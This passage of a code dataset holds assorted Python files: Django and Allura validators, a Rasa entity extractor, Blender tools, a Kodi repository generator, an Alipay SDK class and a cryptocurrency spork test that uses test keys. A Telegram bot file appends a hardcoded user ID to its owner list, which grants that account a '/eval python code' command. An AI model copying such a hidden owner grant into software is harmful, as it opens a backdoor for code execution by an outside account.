ext | sha | content |
---|---|---|
py | 1a38852ecc45a013c14e7161c8360398888f279b | from django import forms
class ContactForm(forms.Form):
name = forms.CharField(max_length=100)
subject = forms.CharField(max_length=100)
email = forms.EmailField()
message = forms.CharField(widget=forms.Textarea) |
py | 1a388818e2bdb430a2272958f49ea281261a2199 | import microbit
import random
import math
_GOLDEN_RATIO = (1 + 5 ** 0.5) / 2
class BreakOutOfALoop(Exception): pass
class ContinueLoop(Exception): pass
timer1 = microbit.running_time()
item = "a"
def run():
global timer1, item
item = "".join(str(arg) for arg in ["sadf", "sdf"])
def main():
try:
run()
except Exception as e:
raise
if __name__ == "__main__":
main() |
py | 1a38897fef42d80b55fbdbfd0f2a764648c6bc0e | from rasa.nlu.components import Component
from typing import Any, Optional, Text, Dict, TYPE_CHECKING
import os
import spacy
import pickle
from spacy.matcher import Matcher
from rasa.nlu.extractors.extractor import EntityExtractor
if TYPE_CHECKING:
from rasa.nlu.model import Metadata
PATTERN_NER_FILE = 'pattern_ner.pkl'
class SpacyPatternNER(EntityExtractor):
"""A new component"""
name = "pattern_ner_spacy"
# Defines what attributes the pipeline component will
# provide when called. The listed attributes
# should be set by the component on the message object
# during test and train, e.g.
# ```message.set("entities", [...])```
provides = ["entities"]
# Which attributes on a message are required by this
# component. e.g. if requires contains "tokens", then a
# previous component in the pipeline needs to have "tokens"
# within the above described `provides` property.
requires = ["tokens"]
# Defines the default configuration parameters of a component
# these values can be overwritten in the pipeline configuration
# of the model. The component should choose sensible defaults
# and should be able to create reasonable results with the defaults.
defaults = {}
# Defines what language(s) this component can handle.
# This attribute is designed for instance method: `can_handle_language`.
# Default value is None which means it can handle all languages.
# This is an important feature for backwards compatibility of components.
language_list = None
def __init__(self, component_config=None, matcher=None):
super(SpacyPatternNER, self).__init__(component_config)
if matcher:
self.matcher = matcher
self.spacy_nlp = spacy.blank('en')
self.spacy_nlp.vocab = self.matcher.vocab
else:
self.spacy_nlp = spacy.blank('en')
self.matcher = Matcher(self.spacy_nlp.vocab)
def train(self, training_data, cfg, **kwargs):
"""Train this component.
This is the component's chance to train itself provided
with the training data. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.train`
of components previous to this one."""
for lookup_table in training_data.lookup_tables:
key = lookup_table['name']
pattern = []
for element in lookup_table['elements']:
tokens = [{'LOWER': token.lower()} for token in str(element).split()]
pattern.append(tokens)
self.matcher.add(key, pattern)
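# Illustrative sketch (values are hypothetical, not from the training data):
# a lookup table like {'name': 'city', 'elements': ['new york', 'berlin']}
# becomes the token patterns
#   [[{'LOWER': 'new'}, {'LOWER': 'york'}], [{'LOWER': 'berlin'}]]
# registered on the Matcher under the key 'city'.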
def process(self, message, **kwargs):
"""Process an incoming message.
This is the component's chance to process an incoming
message. The component can rely on
any context attribute to be present, that gets created
by a call to :meth:`components.Component.pipeline_init`
of ANY component and
on any context attributes created by a call to
:meth:`components.Component.process`
of components previous to this one."""
entities = []
# with plural forms
doc = self.spacy_nlp(message.data['text'].lower())
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Without plural forms
doc = self.spacy_nlp(' '.join([token.lemma_ for token in doc]))
matches = self.matcher(doc)
entities = self.getNewEntityObj(doc, matches, entities)
# Remove duplicates
seen = set()
new_entities = []
for entityObj in entities:
record = tuple(entityObj.items())
if record not in seen:
seen.add(record)
new_entities.append(entityObj)
message.set("entities", message.get("entities", []) + new_entities, add_to_output=True)
def getNewEntityObj(self, doc, matches, entities):
for ent_id, start, end in matches:
new_entity_value = doc[start:end].text
new_entity_value_len = len(new_entity_value.split())
is_add = True
for old_entity in entities:
old_entity_value = old_entity["value"]
old_entity_value_len = len(old_entity_value.split())
if old_entity_value_len > new_entity_value_len and new_entity_value in old_entity_value:
is_add = False
elif old_entity_value_len < new_entity_value_len and old_entity_value in new_entity_value:
entities.remove(old_entity)
if is_add:
entities.append({
'start': start,
'end': end,
'value': doc[start:end].text,
'entity': self.matcher.vocab.strings[ent_id],
'confidence': None,
'extractor': self.name
})
return entities
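# Example of the overlap rule above (hypothetical matches): if "york" is
# already in entities and "new york" arrives, the shorter entity is removed
# and the longer one appended; in the reverse order, the longer match already
# present keeps is_add False so "york" is never added.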
def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:
"""Persist this component to disk for future loading."""
if self.matcher:
modelFile = os.path.join(model_dir, PATTERN_NER_FILE)
self.saveModel(modelFile)
return {"pattern_ner_file": PATTERN_NER_FILE}
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Optional[Text] = None,
model_metadata: Optional["Metadata"] = None,
cached_component: Optional["Component"] = None,
**kwargs: Any
) -> "Component":
"""Load this component from file."""
file_name = meta.get("pattern_ner_file", PATTERN_NER_FILE)
modelFile = os.path.join(model_dir, file_name)
if os.path.exists(modelFile):
with open(modelFile, "rb") as modelLoad:
    matcher = pickle.load(modelLoad)
return cls(meta, matcher)
else:
return cls(meta)
def saveModel(self, modelFile):
with open(modelFile, "wb") as modelSave:
    pickle.dump(self.matcher, modelSave) |
py | 1a3889d77c6754ecec91831d78b52967cdc35785 | import bpy
class AMK2BPanel(bpy.types.Panel):
bl_label = "AMK2B"
bl_space_type = 'VIEW_3D'
bl_region_type = 'TOOLS'
@classmethod
def poll(cls, context):
return hasattr(bpy, "amk2b")
def draw(self, context):
layout = self.layout
row = layout.row()
row.label(text="Receive Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_receiving_started:
row.operator("amk2b.kinect_data_receiving_operator", text="Start")
else:
row.operator("amk2b.kinect_data_receiving_operator", text="Stop")
row = layout.row()
row.label(text="Apply Kinect Data")
row = layout.row()
if not bpy.amk2b.kinect_data_applying_started:
row.operator("amk2b.kinect_data_applying_operator", text="Start")
else:
row.operator("amk2b.kinect_data_applying_operator", text="Stop")
row = layout.row()
row.label(text="Recording")
row = layout.row()
if not bpy.amk2b.recording_pre_started:
row.operator("amk2b.recording_operator", text="Start")
else:
if not bpy.amk2b.recording_started:
row.operator(
"amk2b.recording_operator",
text="waiting..." + str(bpy.amk2b.recording_wait_time)
)
else:
row.operator("amk2b.recording_operator", text="Stop")
|
py | 1a3889e28c3256a51ccd333f94285ded9b7f04b3 | #!/usr/bin/env python3
# Copyright (c) 2018-2020 The Lksc Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import time
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import connect_nodes, wait_until
'''
multikeysporks.py
Test logic for several signer keys usage for spork broadcast.
We set 5 possible keys for spork signing and set the minimum
required signers to 3. We check that 1 or 2 signers can't set the
spork value, that any 3 signers can change it, and that another
3 signers can change it again.
'''
class MultiKeySporkTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 5
self.setup_clean_chain = True
self.is_network_split = False
def setup_network(self):
# secret(base58): 931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F
# keyid(hex): 60f0f57f71f0081f1aacdd8432340a33a526f91b
# address(base58): yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa
# secret(base58): 91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3
# keyid(hex): 43dff2b09de2f904f688ec14ee6899087b889ad0
# address(base58): yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h
# secret(base58): 92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH
# keyid(hex): d9aa5fa00cce99101a4044e65dc544d1579890de
# address(base58): ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7
# secret(base58): 934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD
# keyid(hex): 0b23935ce0bea3b997a334f6fa276c9fa17687b2
# address(base58): ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn
# secret(base58): 92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD
# keyid(hex): 1d1098b2b1f759b678a0a7a098637a9b898adcac
# address(base58): yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui
self.add_nodes(5)
self.start_node(0, ["-sporkkey=931wyuRNVYvhg18Uu9bky5Qg1z4QbxaJ7fefNBzjBPiLRqcd33F",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(1, ["-sporkkey=91vbXGMSWKGHom62986XtL1q2mQDA12ngcuUNNe5NfMSj44j7g3",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(2, ["-sporkkey=92bxUjPT5AhgXuXJwfGGXqhomY2SdQ55MYjXyx9DZNxCABCSsRH",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(3, ["-sporkkey=934yPXiVGf4RCY2qTs2Bt5k3TEtAiAg12sMxCt8yVWbSU7p3fuD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
self.start_node(4, ["-sporkkey=92Cxwia363Wg2qGF1fE5z4GKi8u7r1nrWQXdtsj2ACZqaDPSihD",
"-sporkaddr=ygcG5S2pQz2U1UAaHvU6EznKZW7yapKMA7",
"-sporkaddr=yfLSXFfipnkgYioD6L8aUNyfRgEBuJv48h",
"-sporkaddr=yNsMZhEhYqv14TgdYb1NS2UmNZjE8FSJxa",
"-sporkaddr=ycbRQWbovrhQMTuxg9p4LAuW5SCMAKqPrn",
"-sporkaddr=yc5TGfcHYoLCrcbVy4umsiDjsYUn39vLui",
"-minsporkkeys=3"])
# connect nodes at start
for i in range(0, 5):
for j in range(i + 1, 5):
connect_nodes(self.nodes[i], j)
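# The pair loop above connects every distinct node pair exactly once, forming a full mesh.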
def get_test_spork_value(self, node):
info = node.spork('show')
# use InstantSend spork for tests
return info['SPORK_2_INSTANTSEND_ENABLED']
def set_test_spork_value(self, node, value):
# use InstantSend spork for tests
node.spork('SPORK_2_INSTANTSEND_ENABLED', value)
def run_test(self):
# check test spork default state
for node in self.nodes:
assert(self.get_test_spork_value(node) == 4070908800)
self.bump_mocktime(1)
# first and second signers set spork value
self.set_test_spork_value(self.nodes[0], 1)
self.set_test_spork_value(self.nodes[1], 1)
# spork change requires at least 3 signers
time.sleep(10)
for node in self.nodes:
assert(self.get_test_spork_value(node) != 1)
# third signer set spork value
self.set_test_spork_value(self.nodes[2], 1)
# now spork state is changed
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 1, sleep=0.1, timeout=10)
self.bump_mocktime(1)
# now set the spork again with other signers to test
# old and new spork messages interaction
self.set_test_spork_value(self.nodes[2], 2)
self.set_test_spork_value(self.nodes[3], 2)
self.set_test_spork_value(self.nodes[4], 2)
for node in self.nodes:
wait_until(lambda: self.get_test_spork_value(node) == 2, sleep=0.1, timeout=10)
if __name__ == '__main__':
MultiKeySporkTest().main()
|
py | 1a388a3d7069cd1a269484410e19e91dde23dad7 | from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from TamilBots.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from TamilBots import app, LOGGER
from TamilBots.TamilBots import ignore_blacklisted_users
from TamilBots.sql.chat_sql import add_chat_to_db
start_text = """
Hello [{}](tg://user?id={}),
\n\nI Am Song Play Bot[♪](https://telegra.ph/file/6cb884fe1cb943ec12df1.mp4)
I'M Music Bot By @Arishem_TheJudge
Send The Name Of The Song You Want...
Eg. ```/song Faded```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="Updates", url="https://t.me/Ott_streaming_updates"),
InlineKeyboardButton(
text="๐๐๐ ๐๐ ๐ค", url="http://t.me/SongProBot?startgroup=true"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("help"))
async def help(client, message):
if message.from_user["id"] == OWNER_ID:
await message.reply(owner_help)
return ""
text = "๐ฆ๐ฒ๐ป๐ฑ ๐ง๐ต๐ฒ ๐ก๐ฎ๐บ๐ฒ ๐ข๐ณ ๐ง๐ต๐ฒ ๐ฆ๐ผ๐ป๐ด ๐ฌ๐ผ๐ ๐ช๐ฎ๐ป๐... ๐๐ฅฐ๐ค\n /song (song name) ๐ฅณ"
await message.reply(text)
OWNER_ID.append(1492186775)
app.start()
LOGGER.info("SongPlayRoBot Is Now Working๐ค๐ค๐ค")
idle()
|
py | 1a388d6c71d9b037f6adccd3c72a19133260d8a8 | """
Exposed classes and methods
"""
from .mongo import MongoStorage, MongoMigrationSet
from .sql import SQLStorage, SQLMigrationSet
|
py | 1a388dcfd32c31f9522364b3c14cc34602f7647f | from sqlalchemy.orm import Session
from aspen.database.models import CanSee, DataType
from aspen.test_infra.models.usergroup import group_factory
def test_can_see_constructor_with_datatype(session: Session):
"""Test that we can construct a CanSee object with a `data_type` argument."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(viewer_group=group1, owner_group=group2, data_type=DataType.TREES)
session.add_all((group1, group2, can_see))
session.flush()
assert can_see.data_type == DataType.TREES
def test_can_see_datatype_filter(session: Session):
"""Test that we can filter by the datatype."""
group1 = group_factory(name="group1", address="address1")
group2 = group_factory(name="group2", address="address2")
can_see = CanSee(
viewer_group=group1,
owner_group=group2,
data_type=DataType.TREES,
)
session.add_all((group1, group2, can_see))
session.flush()
session.query(CanSee).filter(CanSee.data_type == DataType.TREES).one()
|
py | 1a388f5be7695d8f0b160c57d6be2eb30ded99c6 | """ downloaded from http://xbmc-addons.googlecode.com/svn/addons/ """
""" This is a modded version of the original addons.xml generator """
""" Put this version in the root folder of your repo and it will """
""" zip up all add-on folders, create a new zip in your zips folder """
""" and then update the md5 and addons.xml file """
""" Recoded by whufclee ([email protected]) """
import re
import os
import shutil
import md5
import zipfile
class Generator:
"""
Generates a new addons.xml file from each addons addon.xml file
and a new addons.xml.md5 hash file. Must be run from the root of
the checked-out repo. Only handles single depth folder structure.
"""
def __init__(self):
# Create the zips folder if it doesn't already exist
zips_path = ('zips')
if not os.path.exists(zips_path):
os.makedirs(zips_path)
# Comment out this line if you have .pyc or .pyo files you need to keep
self._remove_binaries()
self._generate_addons_file()
self._generate_md5_file()
print "Finished updating addons xml and md5 files"
def Create_Zips(self,addon_id,version):
xml_path = os.path.join(addon_id,'addon.xml')
addon_folder = os.path.join('zips',addon_id)
if not os.path.exists(addon_folder):
os.makedirs(addon_folder)
final_zip = os.path.join('zips',addon_id,'%s-%s.zip' % (addon_id,version))
if not os.path.exists(final_zip):
print "NEW ADD-ON - Creating zip for: %s v.%s" % (addon_id,version)
zip = zipfile.ZipFile(final_zip, 'w', compression=zipfile.ZIP_DEFLATED )
root_len = len(os.path.dirname(os.path.abspath(addon_id)))
for root, dirs, files in os.walk(addon_id):
archive_root = os.path.abspath(root)[root_len:]
for f in files:
fullpath = os.path.join( root, f )
archive_name = os.path.join( archive_root, f )
zip.write( fullpath, archive_name, zipfile.ZIP_DEFLATED )
zip.close()
# Copy over the icon, fanart and addon.xml to the zip directory
copyfiles = ['icon.png','icon.gif','fanart.jpg','addon.xml']
files = os.listdir(addon_id)
for file in files:
if file in copyfiles:
shutil.copy(os.path.join(addon_id,file),addon_folder)
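# Resulting layout for a hypothetical add-on id/version:
#   zips/plugin.video.example/plugin.video.example-1.0.0.zip
#   zips/plugin.video.example/addon.xml (plus icon/fanart when present)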
# Remove any instances of pyc or pyo files
def _remove_binaries(self):
for parent, dirnames, filenames in os.walk('.'):
for fn in filenames:
if fn.lower().endswith('pyo') or fn.lower().endswith('pyc'):
compiled = os.path.join(parent, fn)
py_file = compiled.replace('.pyo','.py').replace('.pyc','.py')
if os.path.exists(py_file):
try:
os.remove(compiled)
print"Removed compiled python file:"
print compiled
print'-----------------------------'
except:
print"Failed to remove compiled python file:"
print compiled
print'-----------------------------'
else:
print"Compiled python file found but no matching .py file exists:"
print compiled
print'-----------------------------'
def _generate_addons_file(self):
# addon list
addons = os.listdir('.')
# final addons text
addons_xml = u"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<addons>\n"
# loop thru and add each addons addon.xml file
for addon in addons:
try:
if (not os.path.isdir(addon) or addon == "zips" or addon.startswith('.')): continue
_path = os.path.join( addon, "addon.xml" )
xml_lines = open( _path, "r" ).read().splitlines()
addon_xml = ""
# loop thru cleaning each line
ver_found = False
for line in xml_lines:
if ( line.find( "<?xml" ) >= 0 ): continue
if 'version="' in line and not ver_found:
version = re.compile('version="(.+?)"').findall(line)[0]
ver_found = True
addon_xml += unicode( line.rstrip() + "\n", "utf-8")
addons_xml += addon_xml.rstrip() + "\n\n"
# Create the zip files
self.Create_Zips(addon,version)
except Exception, e:
print "Excluding %s for %s" % ( _path, e, )
# clean and add closing tag
addons_xml = addons_xml.strip() + u"\n</addons>\n"
self._save_file(addons_xml.encode( "utf-8" ), file=os.path.join('zips','addons.xml'))
def _generate_md5_file(self):
try:
m = md5.new(open(os.path.join('zips','addons.xml')).read()).hexdigest()
self._save_file(m, file=os.path.join('zips','addons.xml.md5'))
except Exception, e:
print "An error occurred creating addons.xml.md5 file!\n%s" % (e)
def _save_file(self,data,file):
try:
open(file, 'w').write(data)
except Exception, e:
print "An error occurred saving %s file!\n%s" % (file,e)
if ( __name__ == "__main__" ):
Generator()
|
py | 1a388fb42af5c140d36d53caf05e3dbc711fc46d | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
class AlipayMobilePublicLabelUserAddRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
self._biz_content = value
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.mobile.public.label.user.add'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), use_decimal=True, ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), use_decimal=True, ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
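# Illustrative outcome (assuming ParamConstants maps P_METHOD/P_VERSION to
# 'method'/'version'): get_params() returns a dict along the lines of
#   {'method': 'alipay.mobile.public.label.user.add', 'version': '1.0', 'biz_content': '...'}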
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
|
py | 1a388fb7ad052b54dc3a942c156203ae0277577c | import gc
import math
import os
import struct
import bpy, bpy.props, bpy.ops
import mathutils
from io_scene_valvesource import utils as vs_utils
# <summary> Formats a float value to be suitable for bvh output </summary>
def FloatToBvhString(value):
return "{0:f}".format(value)
def WriteHeader(file, frames, frameTime):
file.write("advancedfx Cam\n")
file.write("version 1\n")
file.write("scaleFov none\n")
file.write("channels time xPosition yPosition zPositon xRotation yRotation zRotation fov\n")
file.write("DATA\n")
class CamExporter(bpy.types.Operator, vs_utils.Logger):
bl_idname = "advancedfx.camexporter"
bl_label = "HLAE Camera IO (.cam)"
bl_options = {'UNDO'}
# Properties used by the file browser
filepath: bpy.props.StringProperty(subtype="FILE_PATH")
filename_ext: ".cam"
filter_glob: bpy.props.StringProperty(default="*.cam", options={'HIDDEN'})
# Custom properties
global_scale: bpy.props.FloatProperty(
name="Scale",
description="Scale everything by this value",
min=0.000001, max=1000000.0,
soft_min=1.0, soft_max=1000.0,
default=100.0,
)
frame_start: bpy.props.IntProperty(
name="Start Frame",
description="Starting frame to export",
default=0,
)
frame_end: bpy.props.IntProperty(
name="End Frame",
description="End frame to export",
default=0,
)
def execute(self, context):
ok = self.writeBvh(context)
self.errorReport("Error report")
return {'FINISHED'}
def invoke(self, context, event):
self.frame_start = context.scene.frame_start
self.frame_end = context.scene.frame_end
bpy.context.window_manager.fileselect_add(self)
return {'RUNNING_MODAL'}
def writeBvh(self, context):
scene = context.scene
frame_current = scene.frame_current
fps = context.scene.render.fps
obj = context.active_object
if (obj is None) or (obj.type != 'CAMERA'):
self.error("No camera selected.")
return False
cam = obj.data
lastRot = None
unRot = mathutils.Matrix.Rotation(math.radians(-90.0), 4, 'X')
file = None
try:
file = open(self.filepath, "w", encoding="utf8", newline="\n")
frameCount = self.frame_end - self.frame_start + 1
if frameCount < 0: frameCount = 0
frameTime = 1.0
if 0.0 != fps: frameTime = frameTime / fps
WriteHeader(file, frameCount, frameTime)
for frame in range(self.frame_start, self.frame_end + 1):
scene.frame_set(frame)
mat = obj.matrix_world
mat = mat @ unRot
loc = mat.to_translation()
rot = mat.to_euler('YXZ') if lastRot is None else mat.to_euler('YXZ', lastRot)
lastRot = rot
loc = self.global_scale * mathutils.Vector((loc[1],-loc[0],loc[2]))
qAngleVec = mathutils.Vector((math.degrees(rot[1]),-math.degrees(rot[0]),math.degrees(rot[2])))
# lens = camData.c.sensor_width / (2.0 * math.tan(math.radians(fov) / 2.0))
fov = math.degrees(2.0 * math.atan((cam.sensor_width / cam.lens) / 2.0))
S = ""+FloatToBvhString((frame-1) * frameTime) +" " +FloatToBvhString(loc[0]) +" " +FloatToBvhString(loc[1]) +" " +FloatToBvhString(loc[2]) +" " +FloatToBvhString(qAngleVec[0]) +" " +FloatToBvhString(qAngleVec[1]) +" " +FloatToBvhString(qAngleVec[2]) +" " +FloatToBvhString(fov) + "\n"
file.write(S)
finally:
if file is not None:
file.close()
scene.frame_set(frame_current)
return True
|
py | 1a38904dad9f63fea0b466c64c2767c1d13659ec | """museumadmin URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from adminapp import views as adminapp_views
urlpatterns = [
path('admin/', admin.site.urls),
path('', adminapp_views.index, name="Homepage" ),
path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
path('dj-rest-auth/', include('dj_rest_auth.urls')),
path('dj-rest-auth/registration/', include('dj_rest_auth.registration.urls'))
]
|
py | 1a389051f185104c0a9f89da9b6253949f4fe0c8 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import re
from bson import ObjectId
import formencode as fe
from formencode import validators as fev
from pylons import tmpl_context as c
from . import helpers as h
from datetime import datetime
class URL(fev.URL):
# allows use of IP address instead of domain name
require_tld = False
url_re = re.compile(r'''
^(http|https)://
(?:[%:\w]*@)? # authenticator
(?: # ip or domain
(?P<ip>(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|
(?P<domain>[a-z0-9][a-z0-9\-]{,62}\.)* # subdomain
(?P<tld>[a-z]{2,63}|xn--[a-z0-9\-]{2,59}) # top level domain
)
(?::[0-9]{1,5})? # port
# files/delims/etc
(?P<path>/[a-z0-9\-\._~:/\?#\[\]@!%\$&\'\(\)\*\+,;=]*)?
$
''', re.I | re.VERBOSE)
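# Sketch of the effect (assumed example, not from the original module): with
# require_tld = False the pattern accepts IP-based URLs such as
# "http://192.168.0.1:8080/path" alongside ordinary domain names.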
class NonHttpUrl(URL):
messages = {
'noScheme': 'You must start your URL with a scheme',
}
add_http = False
scheme_re = re.compile(r'^[a-z][a-z0-9.+-]*:', re.I)
url_re = re.compile(r'''
^([a-z][a-z0-9.+-]*)://
(?:[%:\w]*@)? # authenticator
(?: # ip or domain
(?P<ip>(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|
(?P<domain>[a-z0-9][a-z0-9\-]{,62}\.)* # subdomain
(?P<tld>[a-z]{2,63}|xn--[a-z0-9\-]{2,59}) # top level domain
)
(?::[0-9]{1,5})? # port
# files/delims/etc
(?P<path>/[a-z0-9\-\._~:/\?#\[\]@!%\$&\'\(\)\*\+,;=]*)?
$
''', re.I | re.VERBOSE)
class Ming(fev.FancyValidator):
def __init__(self, cls, **kw):
self.cls = cls
super(Ming, self).__init__(**kw)
def _to_python(self, value, state):
result = self.cls.query.get(_id=value)
if result is None:
try:
result = self.cls.query.get(_id=ObjectId(value))
except:
pass
return result
def _from_python(self, value, state):
return value._id
class UniqueOAuthApplicationName(fev.UnicodeString):
def _to_python(self, value, state):
from allura import model as M
app = M.OAuthConsumerToken.query.get(name=value, user_id=c.user._id)
if app is not None:
raise fe.Invalid(
'That name is already taken, please choose another', value, state)
return value
class NullValidator(fev.Validator):
def to_python(self, value, state):
return value
def from_python(self, value, state):
return value
def validate(self, value, state):
return value
class MaxBytesValidator(fev.FancyValidator):
max = 255
def _to_python(self, value, state):
value = h.really_unicode(value or '').encode('utf-8')
if len(value) > self.max:
raise fe.Invalid("Please enter a value less than %s bytes long." %
self.max, value, state)
return value
def from_python(self, value, state):
return h.really_unicode(value or '')
class MountPointValidator(fev.UnicodeString):
def __init__(self, app_class,
reserved_mount_points=('feed', 'index', 'icon', '_nav.json'), **kw):
super(self.__class__, self).__init__(**kw)
self.app_class = app_class
self.reserved_mount_points = reserved_mount_points
def _to_python(self, value, state):
mount_point, App = value, self.app_class
if not App.relaxed_mount_points:
mount_point = mount_point.lower()
if not App.validate_mount_point(mount_point):
raise fe.Invalid('Mount point "%s" is invalid' % mount_point,
value, state)
if mount_point in self.reserved_mount_points:
raise fe.Invalid('Mount point "%s" is reserved' % mount_point,
